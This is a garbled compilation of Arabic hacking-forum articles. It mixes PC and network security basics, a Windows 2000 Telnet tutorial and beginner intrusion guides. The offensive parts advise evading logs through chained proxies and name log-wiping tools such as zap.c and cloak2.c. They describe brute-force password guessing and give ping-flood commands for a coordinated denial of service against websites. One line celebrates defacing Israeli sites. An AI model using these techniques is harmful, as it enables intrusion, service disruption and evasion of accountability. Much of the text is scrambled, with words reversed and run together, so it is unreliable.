ينتهي. ) والذي الملف هذا على الهاكر حصول فحين الهاكرزوذلك ( PWLباالمتداد له ملك هي بجهازك الخاصة السر كلمة فإن
الملف هذا تشفير بفك تقوم التي البرامج من العديد لوجود . ويندوز نظام فإن بالطبع السر كلمة على على 98والحصول يحتوي
ويندوز نظام في موجودا كان الذي من أقوى ولكنها 95تشفير ، هذا بكسر يقوم برنامج بإيجاد الهاكرز يقوم حتى وقت مسألة
التشفير.
اإلنترنت- 5 وتطبيقات برامجهناك ! إن بل فحسب متصفحات مجرد ليست اإلنترنت تطبيقات إنفي استخدامها يتم التي األخرى والبرامج التطبيقات من العديد
الثغرات. من العديد على تحتوي قد البرامج هذه ولكن اإلنترنتفي للدخول الهاكر يستخدمه الذي المشرع الباب تكون التي األمنية
برنامج ! البرامج هذه ومن إيذائك و الذي ICQجهازك الشهير . من يعتبر وهو اإلنترنت في المستخدمين من الماليين يستخدمهمن يقدمه لما نظرا اإلنترنت مستخدمي بين شعبية البرامج أكثر
. أكثر من أيضا ولكنه المستخدمين بين التواصل تسهل خدماتللتخريب إمكانيات من يقدمه لما نظرا للهاكرز شعبية البرامج
. البرامج من العديد اإلنترنت في فيوجد ضحاياهم بأجهزة والعبثهذه تأثير ويختلف البرنامج، لهذا المستخدمين بمهاجمة تقوم التي
رقم على الحصول من القيام IPالبرامج إلى بالمستخدم الخاصعن الجهاز يتوقف حتى لديه البيانات من هائلة كمية بإرسال
! للتشغيل إعادة بعملية للقيام يضطره مما للمستخدم االستجابة
6 -6: المشبوهة- المواقعفي األمنية الثغرات من الكثير اكتشاف يتم ألخرى فترة منأصحاب قبل من كبير بشكل الثغرات هذه استغالل ويتم المتصفحات
. على الحصول من المخترق تمكن قد الثغرات هذه الهاكرز مواقع . عليك يجب لذا جهازك من الشخصية والمعلومات الملفات بعضمن أصحابها كون في يشتبه التي المواقع زيارة عند الحذر
في بريمجات وضع على المواقع أصحاب لقدرة نظرا المخترقينإلى والدخول متصفحك في األمنية الثغرات الستغالل مواقعهم
من. المخربون بعض به يقوم ما ذلك على األمثلة وأبسط جهازكبريمج ) وفتح( scriptوضع المتصفح برنامج تشغيل بتكرار يقوم
للمستخدم يستجيب ال ويصبح النظام موارد تنتهي حتى جديدة نوافذتم ! الثغرة هذه فإن بالطبع الجهاز تشغيل إلعادة يضطره مما
اكسبلورر إنترنت متصفح في مثاال 4تالفيها تعطي ولكنها فوق وما. المخترقون به يقوم أن ممكن الذي للتخريب بسيطا
7: اإلضافية- الخدماتال قد التي اإلضافية الخدمات بعض على التشغيل نظام يشتمل
بعض فمثال جهازك، إلى المدخل تكون قد والتي المستخدم يحتاجهاوخادم ويب خادم على تحتوي ويندوز نظام من FTPاإلصدارات
إلكتروني ) بريد غالب( SMTPوخادم قبل من تستخدم ال وهيأمنية ثغرات على األحيان أغلب في تحتوي ولكنها المستخدمين
. لهذه تعديالت إصدار دائما ويتم بجهازك العبث من المخترقين تمكن . لذا بتركيبها يقومون ال المستخدمين أغلب ولكن األمنية المشاكل
المستخدم يقوم أن التشغيل نظام تركيب أثناء المستحسن فمنكان حالة وفي لها محتاجا يكون ال عندما الخدمات هذه تركيب بإلغاء
اتصاله عن تشغيلها إيقاف المستحسن فمن لها، محتاجا المستخدممفتوحا البرامج هذه عليه تعمل الذي المنفذ يكون ال حتى باإلنترنتهذه استغالل يريدون الذي المخترقين على الطريق يسد مما
. جهازك في للدخول الخدمات
التي الطرق جميع يشمل ال المقال هذا في ذكرناه ما فإن بالطبعورفع الطرق هذه عن فكرة كافإلعطاء ولكنه ، الهاكرز يستخدمها
يسهم مما باإلنترنت، اتصالهم عن المستخدمين لدى الحذر درجة. لإلختراق تعرضهم احتمالية من التقليل في
والبرامج الطرق عن بالتحدث سنقوم الله بإذن القادم العدد فيو الهاكرز التقاء استخدامها المستخدم على يجب التي الدفاعية
شرورهم.3." اإلنترنت" عبر األمن
اختراق .4 تعلم في تفكروا ان قبل تعرفوه ان يجب الذي الكثير هناكالسيرفرات و المواقع
here we G0حسناا .. ال بيفتحوا يعرفوا ما غير من هاكينج الناسيعملوا من dosالكثير
. shell accountاو بووم. و اوامر شويه مش . it rebootsيكتبوا ديه!!! اختراقك!. تم لقد ثغره
: مثل بسيط امر تستخدم لما الدوس /FTP ftp://hostnameحتى فيانتر تدوس و عندك
عندك سكان GFI LANguard network security scannerاو عملت وبورت منهم و مفتوح بورت كذا لقيت و سايت بتدوسعليه.. 21على
.. .. تم انه يعني هذا التلنت طريق عن نفسالشيئ و بالموقع تتصل واختراقك!!
بتعمل لما عشان : ftpباوامر log inده زي و... cd lcd dir lsبسيطهتانيه حاجه اي
ماتعمل مجرد اسمها log inالن حاجه LOGS...)LOG.FILES( 1فيال بقى ده؟؟ LOGايه
)log filesال بالجهاز اتصل شخص كل عن شئ كل بتسجل logedديهin: مثل( معلومات على يحصلوا و
بالضبط الهاكينج عملت متى يروناتيت موقع اي من
ايه اد onlineفضلتبتاعك >>>>>>>IP Addressال(host nameال الجهاز ) اسم
القارهالدولهالمدينهالمتصفح
التشغيل نظامscreen resolutionال
الشاشه الوان( الخاصبك الخدمه (>>>>ISPمزود
:log filesانواع 3هناك مهمه WTMP \ \ باالضافه - الخروج الدخول ميعاد مع خروج، دخول كل يسجل
ال ttyو hostالىUTMP - منOnlne اللحظه هذه في
LASLOG\ خروج - الدخول جاء اي من
( !! عليهم نظره يلقي ان اراد االدمن لو لذا الكثير الكثير (log.filesو( بك يوقع ( ...track you downسوف
! : حلجه بسادي بروكسي هاستخدم انا مفيشمشكله تقول ربماالبروكسيهات عن تعرفها الزم
-- >-- الموقع--< البروكسي خادم !FTPجهازك اخر-- شئ اي او تلنت . شويه معاه لو مين انت يعرف عاوز االدمن و موقع اخترقت لو
.. ! نفس هيجيبك و سيرفر البروكسي يخترق حتي او فلوسهيعرفبروكسي من اكثر بتستخدم لو الكالم
-- >-- الثاني--< البروكسي خادم االول البروكسي خادم جهازك-- --...so onالثالث<
!! النهايه في لكن اكثر وقت و فلوسكثير بسهيحتاج يجيبك يقدريقدر..
.. اسمه شيئ تستخدم ايضا تقدر :-WingateلكنWingate او واحد انترنت كونكشن بمشاركه يسمح بروكسي هو
ال.. فائده ال Wingateاكثر سيخفي الذي IPانه الكمبيوتر عن!! به ستتصل
.. عنه اعرفه ما كل هذا لالسف بعضاالشخاصاالذكياء 1لكن نحتاج! نجده؟ اين و نستخدمه كيف ليعلمونا
.... اممممممــم ايضاا ماذا ..!! كيفتظل تعرف ان يجب شئ كل قبل تذكرت anonymousاه
ال !!...... webعلى ال.. مثل جهازك؟ تؤمن كيف استخدم. spywareوfirewall ال ) zone alarmمثل و . كالكوكيز الهيستوري ملفات امسح
.. الشخصيه الملفات و المؤقته االنترنت ملفات و هيستوري االنترنت !! ) لدي عالنت ادخل ان قبل يوم كل االشياء هذه افعل انا اللوق و
اسمه رائع ., windows washerبرنامج لقد عندك يكون ان يجب. .. هاهاها سرقته المدرسه من عليه خصلت
. اكتب و لجوجل اذهب الكثير how to Stay anonymous on the webوhow to secure to secure my computerاو
ستجد .. انك متأكد انا و كهذا شئ ابحثعن و جيد امني موقع زور اوالكثير ..
ال تنسى ال ان .. Preety Good Privacy )PGP(dو يجب مجاني انه! فيه ايميلك تترك و موقع اختراق تريد كنت لو عندك يكون
: من عليه تحصل ان /http://www.pgpi.org تستطيعok ان يجب لكن الكثير هناك لكن كتابته يمكنني ما كل هذا ان اظن
! عنه تبحث
اخواني يا الدرسشيئا هذا يعلمك ان ارجوا
هذه .. .. االجابه يحتاج الذي الوحيد لست و االن سؤال لدي لكنالهاكينج يتعلم ان قبل الجميع يعرفها ان يجب االجابه
ال- 1 تستخدم نجده؟ wingateكيف اين و ؟ما على شئ كل ان نتأكد كيف و نجدهم؟ كيف و اللوقز؟ نمسح كيف
اثار! اي نترك لم اننا نتأكد كيف و خلفنا؟ tracksيرام؟ : اسمه و اعرفه برنامج هو log modifierها
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c
wtmped.c zap.c ==================================================
========================================== . اكثر او سؤالين سألت و اسبوعين اخر في عرفته ما كل اخي يا هذا
البقاء كيفيه و anonymousعن البروكسيز استخدام عن و عالنت.. . سألت سؤال كم ليسالمهم بالنهايه لكن الناسجاوبوني بعض
!!!. في تبحث ان اخي يا ارجو لذا المهم هو هذا االجابه تجد ان يجب. االختراق تتعلم بعدها ثم اوال المجال هذا
انتهى،،،
" الشبكات" أمن> إعصار> منتدى من منقول
> : الجوكر> الكاتبكتاب . عن نقال الحماية بعضطرق سأتناول الموضووع هذا فى
هذه . مثل لمواضيع القسم هذا إلفتقار وهذاضميركم . وزاع سماع أرجو لذلك
--------------------------------------------------------كيفية- 1 و الشبكة لها تتعرض قد التي األمنية المخاطر لبعض عرض
. منها الوقاية2. بأمنها- الشبكة الى الولوج لعالقة وصف
3. الوصول- تراخيص بواسطة الموارد حماية كيفيةلمكونات- 4 .ACLشرح
5. التراخيص- تفحص لعملية شرح
: يلي مما المرخصألي غير للوصول عرضة تكون قد شبكة أي
1. المعدات-
3. البيانات-
3. الشبكة- عمليات
4. الموارد-
عبر المتداولة البيانات حساسية مدى على الشبكة أمن درجة تعتمد الشبكة.
كل للند الند شبكات ففي ، الشبكة لنوع وفقا األمن تنظيم يتم وشبكات أمن في المزود يتحكم بينما ، الخاص أمنه في يتحكم جهاز
. المزود الزبون
أمن على المحافظة في تساعد التي بعضاإلجراءات هناك و الشبكة:
1. األمن- إجراءات مع التعامل على للمستخدمين المتقن التدريب
غير- 2 قبل من اليها الوصول صعوبة و المعدات أمن من التأكد المخولين.
تكون- 3 قد ألنها األعين عن إخفاءها و النحاسية األسالك حماية. للتجسس عرضة
وكالة- 4 فتضعها مقاييسالتشفير أما الحاجة عند البيانات تشفيراألمريكية الوطني .)National Security Agency )NSAاألمن
أقراصمرنة- 5 محركات على تحتوي ال بأجهزة المستخدمين تزويدبالمزودات األجهزة هذه تتصل و ، أقراصصلبة حتى أو مضغوطة أو
إقالع رقاقة األجهزة ROM Boot Chipباستخدام هذه تشغيل عند وذاكرة في اإلقالع برنامج بتحميل المزود ليبدأ RAMيقوم للجهاز
بالعمل.
على- 6 إجراؤها يتم التي العمليات جميع لتسجيل برامج استخدام. الضرورة عند لمراجعتها الشبكة
تصاريح- 7 و Permissionsإعطاء للبيانات للوصول للمستخدمينمشاركة يجب الحالة هذه في و عمله طبيعة حسب كل المعدات
. باستخدامها لآلخرين للسماح المعدات و البيانات
بحقوق- 8 المستخدمين العمليات Rightsتزويد و األنشطة تحدد. النظام على إجراءها لهم المسموح
الحقوق : و التصاريح إلعطاء أساسيان نظامان هناك
1. مرور- بكلمة المحمية المشاركة
2. الوصول- تصاريح
المطلوب الموارد من لكل سر كلمة تعيين يتم األول النظام فيكلمة لديه من قبل من فقط الموارد لهذه الوصول يتم و مشاركتها
السر.
وصول أم فقط للقراءة هي هل الوصول درجة تحديد تستطيع كما. السر لكلمة وفقا أم كامل
لكل التصاريح إعطاء و الحقوق تعيين يتم الثاني النظام فيكلمة المستخدم يدخل أن يكفي و ، مستخدمين مجموعة أو مستخدم
حقوق على النظام ليتعرف التشغيل نظام الى الدخول عند المرور
أمنا أكثر النظام هذا يعتبر و له، المتوفرة التصاريح و المستخدم هذا. مستخدم بكل أكبر تحكما الشبكة مدير يعطي و السابق النظام من
مدير الى المعلومات هذه تمرير يتم المرور كلمة و اإلسم إدخال عندالحسابات الولوج )Security Accounts Manager )SAMأمن كان فإذا
جهاز قاعدة Workstationالى مع مقارنتها يتم المعلومات فإنالى الولوج كان إذا أما الجهاز، في المحلية األمن حسابات بيانات
مزود Domainنطاق الى إرسالها يتم المعلومات الذي SAMفإنالمستخدم اسم كان فإذا النطاق، حسابات بيانات قاعدة مع يقارنها
الى الدخول من يمنع المستخدم فإن صالحين غير المرور كلمة أوبإصدار يقوم الفرعي األمن نظام فإن صحيحين كانا إذا أما النظام،
ولوج و Access Tokenبطاقة ولوجه فترة بالمستخدم النظام تعرف: التالية المعلومات على البطاقة هذه تحتوي
األمني- 1 خاص )Security Identifier )SIDالمعرف فريد رقم هو و. حساب بكل
المجموعة- 2 التي Group SIDsمعرفات المجموعة تحدد التي هي و. المستخدم لها ينتمي
.Privilegesاإلمتيازات- 3 لحسابك الممنوحة الحقوق تمثل هي و
إصدار يتم أنه جهازك Access Tokenكما من اإلتصال محاولتك عندبعد عن الولوج اإلجراء هذا على يطلق و شبكتك على آخر بجهاز
Remote Logon.
هو الشبكة أمن عن الحديث عند مراعاتها يجب التي األمور مناألقراصو محركات و الطابعات مثل الموارد أمن على المحافظة
هذه إلستخدام تصاريح بتعيين الشبكة مدير يقوم التي و الملفات الموارد.
: يلي ما الملفات الى للوصول تعطى قد التي التصاريح من و
1. الملفات- نسخ بعرضو لك يسمح و قراءة تصريح
2. للتطبيقات- تنفيذ تصريح
3. الملفات- محتوى في بالتعديل يسمح و كتابة تصريح
اإلستخدام- 4 .No Accessممنوع
و المستخدمين من مجموعة أو لمستخدم منحها ممكن التصاريح و. أ�سهل هذا
بالوصول تحكم قائمة الموارد من مورد كل Access ControlيمتلكList )ACL( في إدخالها يتم معلومة كل عليها ACLو Accessيطلق
Control Entry )ACE(.
إنشاء على ACEيتم تحتوي و المورد إلستخدام التصريح منح عندSID نوع الى باإلضافة التصريح الممنوحة مجموعته أو للمستخدم
و قراءة تصريح منح قد ما مجموعة مدير أن افترضنا فلو التصريح،فإن ما لملف كتابة الى ACEتصريح إضافته ثم إنشاؤه يتم جديد
ACL سيحتوي و بالملف المجموعة SIDعلى ACEالخاص لمدير. كتابة تصريح و قراءة تصريح الى باإلضافة
ل نوعان :ACEهناك
مسموح- 1 .AccessAllowedالوصول
ممنوع- 2 تصريح AccessDeniedالوصول كان إذا إنشاؤها يتم وهو .No Accessالوصول
مقارنة يتم ما مورد الى الوصول ما مستخدم يحاول عندما هكذا وSID مع به كل SIDsالخاص .ACLمن ACEفي للمورد
ويندوز ويندوز NTفي ترتيب 2000و تكون ACEيتم بحيثAccessDenied ACEs قبلAccessAllowed ACEs وجد فإذا ،SID
من أي في الى AccessDenied ACEsخاصتك الوصول من فستمنعفسيبحثفي إال و الحقوق AccessAllowed ACEsالمورد من للتأكد
على يعثر لم فإن لك فستعرض SIDالممنوحة لخاصتك مطابق. للمورد الوصول من تمنعك تحذير رسالة
: الدرس ملخص
الشبكة أمن على للمحافظة اتخاذها يجب التي بعضاإلجراءات هناك: منها و
استخدام ، البيانات تشفير ، المعدات حماية ، المستخدمين تدريب. الشبكة على تجرى التي العمليات مراقبة ، األقراص عديمة أجهزة
الحقوق : و التصاريح إلعطاء أساسيان نظامان هناك
1. مرور- بكلمة المحمية المشاركة
2. الوصول- تصاريح
5. " المواقع اختراق في للمبتدئين مهمة "مصطلحات>منقول<
>BeReal:الكاتب<
عليكم السالماختراق طرق تعلم في المبتدئين الملفالخواني هذا اعددت لقد
فقد ، المواقعال قد التي و عليهم غريبة تكون قد التي الكلمات بعض تواجههم
، يفهمونهاالتعلم . و الفهم مواصلة في العواقب بعض لهم تشكل بالتالي و
الموفق .فالله==================================================
===================يعمل . -:)Telnet( تلنت هو و الويندوز في موجود صغير برنامج هو و
ككالينتالبرنامج . هذا باستطاعة أن أي كزبون دائما تكون وضعيته أو
بالسيرفر اإلتصالحالتها . و مستواها حسب كل العمليات بعض اجراء و أوالخادم
الهاكرز يستخدمهلإلتصال و ، له التابع السيرفر و الموقع تشغيل نظام لمعرفة غالبا
بالسيرفربي ) تي اإلف بورت خصوصا و معين بورت الى( 21عبر للدخول
خفية بطريقة الموقعAnonymous Mode او الباسورد ملف سحب و الموقع لعرضملفات
البيانات من .غيرهالى اذهب ، البرنامج ستظهر Start ==< Run ==< telnet الستخدام و
التلنت .شاشة------------------------------------------------------------------------
أو السكان على -:Scanner برامج للمسح موجودة برامج هي وكشف و المواقع
واسعة بيانات قاعدة تملك أنها كما سريعة، فهي ، وجدت ثغراتهاإنكبيرة و
االكسبلويت أو الثغرات على تطبيقها )Exploits( تحتوي يتم التيالموقع على
و . ال أم الثغرات هذه احدى من يعاني السيرفر كان اذا فيما لرؤيةأمثلة من
برنامج البرامج، Omran و Stealth و Shadow Security Scanner هذهFast
Scanner ، . الخعلى سكان بعمل تقوم التي منها ، مختلفة أنواع البرامج لهذه و
سيرفر أو نظامالـ سيرفرات على بالسكان المختصة البرامج مثل منها IIS معين و
المسح برامجفقط اي جي السي ثغرات ذلك CGI على الى ما . و
-----------------------------------------------------------------------
المتصفح . -:)Exploits( اكسبلويت خالل من تنفذ تنفيذية برامج هيعنوان لها و
URL ، بعضها تقوم و الموقع بعرضملفات اإلكسبلويتات هذه تقومالى بالدخول
هجوم بشن تقوم اكسبلويتات توجد كما ، فيه التجول و السيرفرمعين بورت على
بـ يسمى ما هذا و ، كراشله لعمل السيرفر Buffer Over Flow في
Exploits .ال فمنها ، اإلكسبلويت من أنواع ال CGI Exploits هناك CGI أو
Bugs منها وال Unicodes Exploits ال منها ، و Buffer Over Flow Exploits ، و
منها، PHP Exploits ال ال منها حجب DOS Exploitsو بعملية تقوم التي و
الخدمةيكن لم ان و الهجوم لهذا المطلوبة الثغرة فيها وجد إن للسيرفر
السيرفر علىفايروول بلغة . Fire Wall أي المكتوبة بعضاإلكسبلويتات هناك و
يكون و السي. )c.( امتدادها
و لترجمتها برنامجا او كومبايلر الى تحتاج بالذات اإلكسبلويتات هذهتحويها
خالل من يستخدم عادي تنفيذي اكسبلويت الى االكسبلويت أيلتحويل و ، المتصفح
إما نحتاج ، تنفيذيا برنامجا الى هذه السي بلغة المكتبو اإلكسبلويت الى
ضمن يعمل كومبايلر اي الى او ، يونكس لينوكساو التشغيل نظامالتشغيل نظام
برنامج . ) ( المحوالت أو المترجمات الكومبايلرات هذه أشهر ويندوز اسمه
Borland C++ Compiler كما ويندوز التشغيل نظام تحت تعمل هي وسابقا .ذكرنا
----------------------------------------------------------------------
الناري لحمايتها -:FireWall الجدار السيرفرات تستعملها برامج هيالولوج من
الحماية . تمثل هي المتطفلين قبل من ملفاتها لنظام شرعي الغيرطبعا ، للسيرفر
السيرفرات لحماية المستخدمة الفايرووالت بأن أنوه لكني وتختلف) ( المواقع
األجهزة لحماية تستخدم التي تلك . عن----------------------------------------------------------------------
Token:- المظلل الباسورد ملف الذي )Shadowed Passwd( هو والباسورد فيه يكون
أو * شكل ، . Shadowed أي x على مظلال الباسورد ملف وجدت إنحينها عليك فيجب
يسمى الذي و المظلل الغير الباسورد ملف عن . Shadow file البحثفي تجده
/etc/shadow .----------------------------------------------------------------------
Anonymouse:- فيها تدخل التي المجهولة و الخفية الوضعية هيالمراد الموقع الى
.، بنفساإلسم بي تي االف برامج في خاصية هناك اختراقهتستعملها ان تستطيع
منه الملفات سحب و السيرفر الى المجهول الدخول . في----------------------------------------------------------------------
Valnerableties:- أو محصنة الغير الضعف مواضع أو الثغرات أيللعطب القابلة
مما عليه أمنيا خطرا تشكل قد التي و السيرفر منها يعاني التي والى يؤدي
أو اختراقه و السيرفر مهاجمة في الهاكرز قبل من استغاللها. تدميره
؟ مفردها هي ما ، Valnerable و الضعف موضع باألصح أو ثغرة أي المكان
البريدية . القوائم في الكلمة هذه تكثر و سليم بشكل مؤمن الغيرالمهتمة للمواقع
الموجودة البريدية كالقائمة غيرها و الشبكات أمن و بالسيكيوريتيموقع في
Security Focus غيرها او تراك بوق . أو----------------------------------------------------------------------
passwd file : و الروت باسورد على يحتوي الذي الملف هواألشخاص باسوردات
في . موجود الموقع باسورد السيرفر الى بالدخول لهم المصرح.نفسالملفطبعا
----------------------------------------------------------------------الـ أو له : root الجذر ، للنظام الرئيسي و الجذري المستخدم هو و
الصالحيات كلأو اضافة أو إزالة من السيرفر و الموقع ملفات مع التعامل في
للملفات .تعديلالمواقع في نفسه الموقع باسورد هو الروت باسورد يكون ما غالبا
ضمن تعمل التيو اسدي بي فري و سوالري يونكسو لينوكساو التشغيل نظام
. غيرها----------------------------------------------------------------------
ملفات :Server السيرفر كل أن اذ ، للموقع المستضيف الجهاز هوفيه توضع الموقع
عالية امكانيات ذو لكنه األجهزة من كغيره عاد كمبيوتر جهاز فهوالقرص حجم ككبر
باإلنترنت متصل هو و ، الهائلة سرعته و هو 24الصلب هذا و ، ساعة كون سبب
شغالة اإلنترنت 24المواقع السيرفر. على يستضيف و يملك قد موقع من أكثر
. ضربة ألخرى شركة من و آلخر سيرفر من يعتمد هذا و واحد،اختراق هي طبعا الهاكرز
اختراق حينها فيسهل ، المواقع من الكثير يملك الذي السيرفرالتي المواقع جميع
أو ملفاتها في العبث أو تدميرها الى إما يؤدي مما تحته تندرجأو واجهتها تشويه
يحدث ما هذا و ، تماما النت من مسحها أو تدميرها و بياناتها سرقة للمواقع
المجاهدون . - أيها خيرا الله جزاكم الحمد لله و بكثرة و - اإلسرائيلية.
-----------------------------------------------------------------------فلو أوفر أنواع : ) Buffer over Flow ( بوفر من نوع هي و
التي االكسبلويتاتمثل السيرفر من معينة نقطة على الطفح هجوم لشن تستعمل
بي تي اإلف بورت على الهجومبهذا بهذا اتصاله فصل و السيرفر اتصال اضعاف ألجل غيره أو
الرقعة اللغاء و البورتطبعا - - الكراشلها عمل بعد مجددا استغاللها يتم كي بها الموجودة
استغاللها يتمو حواجز او رقع أي وجود دون و بسهولة و لها اإلتصال معاودة في
منها البيانات . سحبالخدمة حجب بعملية ما نوعا شبيهة هي تقوم - DOS - و أنها اذ
على لود اوفر بعمليةالسيرفر من مركز . جزء،،،
6. " للمبتدئين المواقع "اختراقللمبتدئين :::اإلختراق
اختراق في المستخدمة الطرق بشرح أقوم سوف القسم هذا فيتعتمد الطرق وهذه للمبتدئين بالنسبة المواقع
. قائمة على تحتوي البرامج وهذه التخمين برامج على كليا اعتمادايقوم كلماتسر على تحتوي كبيرة
السر كلمة إلى يصل أن الى الهدف الموقع على بتجربها البرنامجوبعد الهدف بالموقع الخاصة الصحيحة
. أنها الطريقة هذه يعيب لكن الموقع على المخترق يسيطر ذلكوباأليام بالساعات طويلة أوقات إلى تستمر
باألنترنت الوقت طوال متصال سيبقى الجهاز ألن ماديا مكلفة وهيالسرالصحيحة كلمة اكتشاف يتم .حتى
،،،انتهى
برامج " بدون المواقع " تدمير> ماكسهاك: > الكاتب
برامج بدون المواقع لتدمير طرق عدة بشرح الدرسسأقوم هذا فينفسه الموقع على كبير عدد يجتمع أن لتدميرها شرط هناك ولكن
نفسالوقت بعضفي معا الطريقة بتطيق ...ويقوموااألولى ::الطريقة
: ==>=== " ـ " التالي األمر اكتب الدوس إلى بالتوجه قمPing www.xx.com
الموقع اسم Xxx: يعنيالموقع بي أي رقم لك سيخرج ذلك .بعد
األمر بكتابة :قم) الموقع ( )اسم الضربه ping -n )عددالضربات( I- )قوة
ذلك :مثالping -n 1000 -l 400 www.xxx.com
الثانية ::الطريقةاألعلى في الي بالطريقة المراد الموقع تبع بي األي استخراج ...بعد
األمر بكتابة :قمping -t ip
الموراد ip حيث الموقع بي أي .يعني،،،انتهى
" التلنيت "> نورة موقع من >منقول
على قادر ستكون الموضوع هذا قراءة بعدالتلنت خدمة معنى فهم
بها والتحكم الخدمة تشغيل مكان معرفةالتلنت وإستخدام التثبيت تمرين
ويندوز في التلنت التلنت 2000خدمة عميل لمستخدمين تسمح األوامر سطر وإستعمال التلنت خدمة يشغل بكمبيوتر باإلتصالالتلنت خدمة تكون أن ويمكن ، يجلسأمامه كان لو كما ويصبح
البعض بعضهم مع المستخدمين إلتصال عبارةإلى يدعم أن يمكن التلنت خدمة يشغل كمبيوتر تلنت 63وأي عميل
وقت أي فيTelnet Authentication
You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security scheme is integrated into Windows 2000 security. If you
do not use the NT LAN Manager )NTLM( authentication option, the user name and password are sent to the Telnet server as plain
text.s 2000 security context for authentication and the user is not prompted for a user
If you are using NTLM authentication, the client uses the Windowname and password. The user name and password are
encrypted. اجل من بك الخاصه المرور وكلمة اسمك استعمال يمكنمن التحقق خيار تستخدم كنت إذا ، التلنت ملقم إلى الوصول
تكن NTLM الصحة لم وإذا مشفرة المرور كلمة و االسم سيرسلكنصعادي سترسل مستخدمة
مالحظةIf the User Must Change Password At Next Logon option is set for
a user, the user cannot log on to the Telnet service when NTLM authentication is used. The user must log on to the server directly
and change the password, and then log on through the Telnet client. ألحد المرور خصائصكلمة في منشط الخيار هذا كان إذا
إستخدام عند التلنت ملقم على الدخول من يتمكن لن المستخدمينNTLM خدمة على التسجيل ثم المرور كلمة تغير ثم الدخول يجب
التلنت
التلنت ملقم إيقاف و تشغيلIn a Windows 2000 Server default installation, the Telnet service is
set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start, stop, or configure the
Telnet service for automatic startup. االفتراضي التثبيت فيالوضع 2000لويندوز على وتكون منشطة غير التلنت خدمة تكون
األداة إستخدام ويمكن ، خدمة Services اليدوي إيقاف أو لتشغيلالتلنت
التلنت مكانIn the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from
the console tree, and then select Telnet from the list of services in the details pane.
االوامر سطر من إيقافة و التلنت تشغيلYou can also start or stop the Telnet service from a command
prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the command prompt, and then press Enter. To stop
Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press Enter.
Telnet Server Admin األداةYou can use the Telnet Server Admin utility to start, stop, or get
information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server
registry settings. األداة إستخدام Telnet Server Admin يمكنويمكن الملقم عن معلومات على الحصول أو إيقاف أو لتشغيل
الحالية الجلسة في التحكم و المستخدمين عدد على الحصول كذلكاالعدادات تغير و اإلتصال إنهاء من
األداة على , Telnet Server Admin لفتح Telnet أضغطAdministration Tool في اضغط Administrative Tools الموجودة أوStart, ثم Run, اكتب tlntadmn, ثم OK. األداة فتح تستطيع ال كنت إذا
Telnet Server Admin , اإلدارة أدوات تثبيت إلى تحتاج)Adminpak.msi(.
7. التلنت عميلYou can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server
software. Once you have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet software is configured.
Communication, games, system administration, and local logon simulations are some typical uses of Telnet.
The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The
Telnet client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a remote computer, log on to the remote computer,
and interact with it as if you were sitting in front of it.Users of previous versions of Microsoft's Telnet client may notice
a few changes in the version included with Windows 2000. The most obvious change is that Microsoft Telnet Client is now a
command-line application rather than a Windows application. As a command-line application, Microsoft Telnet Client will seem very
familiar to users of UNIX-based Telnet clients.An important new feature found in Microsoft Telnet Client is NTLM
authentication support. Using this feature, a computer using Microsoft Telnet Client can log on to a Windows 2000 computer
running the Telnet service by using NTLM authentication.
التلنت إستعمالاكتب ,Run ثم ,Start انقر ,Telnet لتشغيل كتابة .telnet ثم وتستطيعtelnet . يكون أن يجب التلنت أستخدام من لتتمكن األوامر موجه فيلديك TCP/IP البروتوكول ويكون تكوينه ومضبوط جهازك على مثبت
به ستتصل الذي الجهاز على مسجل حسابTo display help for Telnet, type help at the Microsoft Telnet
command prompt. To connect to a site, type open >computer_name< where >computer_name< is the IP address or
host name of the computer running the Telnet service.التلنت بخدمة وإتصال ضبط تمرين
جهازين األقل على شبكة لديك يكون أن يجب التمرين هذا فيالبعض بعضهم مع متصلين
اسمه االول الجهاز أن الثاني Hishem1 ولنفترض Hishem2 وعلى مثبته التلنت خدمة سنقوم Hishem2 وسنفترضأن ثم
من Hishem2 إلى Hishem1 باإلتصالجهاز على الخدمة بتثبيت اآلن Hishem1 سنقومإلى الدخول Administrator ك Hishem1 سجل
.Services اضغط Administrative Tools ثم ,Programs ثم , Start مناألداة Services تظهر
على مزدوج ضغط ثم اسفل ألى مرر النافذه .Telnet منحوار مربع )The Telnet Properties )Local Computerيظهر.Automatic إلى Manual من Startup Type غير
القسم . Start اضغط,Service status فيالحوار OK اضغط مربع Local Computer( Telnet properties( إلغلق
التحكم وحدة . Services أغلق
من Hishem2 إلى Hishem1 سنتصل
.Run ثم , Start من .OK ثم telnet اكتب
تلنت مايكروسوفت أوامر موجه تظهرالمتاحه ? help اكتب األوامر لمشاهدة أو
التلنت خدمة في المدعومة األوامر جميع تظهر open Hishem2 اكتب
الترحيب شاشة ستشاهد
مالحظةحرف إستخدام open بدل o يمكن
في األوامر سطر من تشغيلها يمكنك اوامر Hishem2 أيجهاز إلى اآلن سننتقل توقفه ال نشط اإلتصال هذا Hishem2 اترك
التلنت جلسة لمشاهدة
جهاز اإلتصال Hishme2 من ونقطع نوقف ثم التلنت خدمة سنراقبالعميل Hishem1 من
.Run ثم , Start من .OK ثم tlntadmn اكتب
األداة اوامر إطار Telnet Server Admin يظهرقد 1اكتب نشاهد المثال في كما الحالية اإلتصاالت جميع لمشاهدة
الدومين اسم و المستخدم االتصال IP ورقم NOR عرضاسم ونوعالدخول ووقت
مستخدم 2اكتب جلسة إلنهاء فصله تريد الذي المستخدم هوية تحديد منك تطلب رسالة تظهر
المثال 1اكتب في معنا يوجد وال القائمة في المستخدم رقم هذا تكتب لذالك احد و 1غير
المتاحة باالوامر الئحة تظهر
جهاز إلى المثال Hishem1 إرجع مثل إنفصل قد االتصال أن ستراللمتابعة مفتاح أي اضغط
البريد جلب في التلنت خدمة من نستفيد كيفأن يمكن ما لسبب المخصصة بالبرامج البريد سحب عليك تعذر إذ
سبب تكون قد التي الرسائل وحذف البريد لسحب التلنت تستخدميلي كما الطريقة و المشكلة
